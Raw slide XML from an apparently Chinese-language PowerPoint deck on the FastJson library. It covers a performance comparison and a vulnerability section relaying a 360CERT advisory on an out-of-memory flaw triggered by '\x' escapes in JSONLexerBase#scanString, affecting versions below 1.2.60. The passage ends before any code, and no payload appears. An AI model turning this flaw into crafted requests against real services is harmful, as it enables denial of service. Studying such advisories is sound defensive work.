                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>468bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>JSON Bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>测试，从测试结果来看，无论序列化和反</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>超越了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>protobuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，可以当之无愧</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fast! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>它比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>deserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>快超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>多倍，比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>快</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>倍。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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17387738"/>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403.ssl.qhimgs4.com/t017d76b72a2fd9a0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24688800" cy="14010968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Shape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911211" y="7751057"/>
            <a:ext cx="14276440" cy="1967124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3175">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="48220" tIns="48220" rIns="48220" bIns="48220" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1285875">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr sz="7600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei"/>
                <a:ea typeface="Microsoft YaHei"/>
                <a:cs typeface="Microsoft YaHei"/>
                <a:sym typeface="Microsoft YaHei"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9924FA"/>
                </a:solidFill>
                <a:latin typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9924FA"/>
                </a:solidFill>
                <a:latin typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> FastJson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="9600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9924FA"/>
                </a:solidFill>
                <a:latin typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>漏洞分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3278202942"/>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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1030682" y="2668061"/>
            <a:ext cx="21671663" cy="5847755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="squar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54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rPr>
              <a:t>漏洞背景</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="5400" b="1"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800" b="0"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rPr>
              <a:t>2019年9月5日，360CERT监测到2019年9月3日fastjson在commit </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>995845170527221ca0293cf290e33a7d6cb52bf7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0"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rPr>
              <a:t>上提交了旨在修复当字符串中包含\x转义字符时可能引发OOM的问题的修复。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="48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800" b="0"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rPr>
              <a:t>360CERT 判断该漏洞危害中。影响面较大。攻击者可以通过发送构造好的请求而致使当前线程瘫痪，当发送的恶意请求过多时有可能使业务直接瘫痪。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="48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800" b="0"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rPr>
              <a:t>建议广大用户对自身的业务/产品进行组件自查，防止自身业务受到攻击。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="48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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030681" y="8269595"/>
            <a:ext cx="21671663" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>影响版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>fastjson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> &lt; 1.2.60</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12674644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593429"/>
            <a:ext cx="6871113" cy="1251544"/>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zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1C3267"/>
                </a:solidFill>
                <a:latin typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="图示 3"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2722396831"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5328595" y="3015214"/>
          <a:ext cx="13406877" cy="91249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6335947" y="4435574"/>
            <a:ext cx="457658" cy="939199"/>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3578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="5400" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="5400" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7009836" y="7095395"/>
            <a:ext cx="457658" cy="939199"/>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3578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="5400" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6364801" y="9843772"/>
            <a:ext cx="457658" cy="939199"/>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3578" tIns="53578" rIns="53578" bIns="53578" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="821055" rtl="0" fontAlgn="auto" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="5400" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="328511102"/>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20679"/>
            <a:ext cx="6871113" cy="11970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en-US" altLang="zh-CN" sz="5400" dirty="0" smtClean="0"/>
              <a:t>OOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1030682" y="2355964"/>
            <a:ext cx="22181574" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EBFAEA"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="squar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800" b="0"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rPr>
              <a:t>漏洞的关键点在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>com.alibaba.fastjson.parser.JSONLexerBase#scanString</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0"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rPr>
              <a:t>中，当传入json字符串时，fastjson会按位获取json字符串，当识别到字符串为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0"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rPr>
              <a:t>为开头时，会默认获取后两位字符，并将后两位字符与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>\x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="4800" b="0"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rPr>
              <a:t>拼接将其变成完整的十六进制字符来处理：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="48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 </a:t>
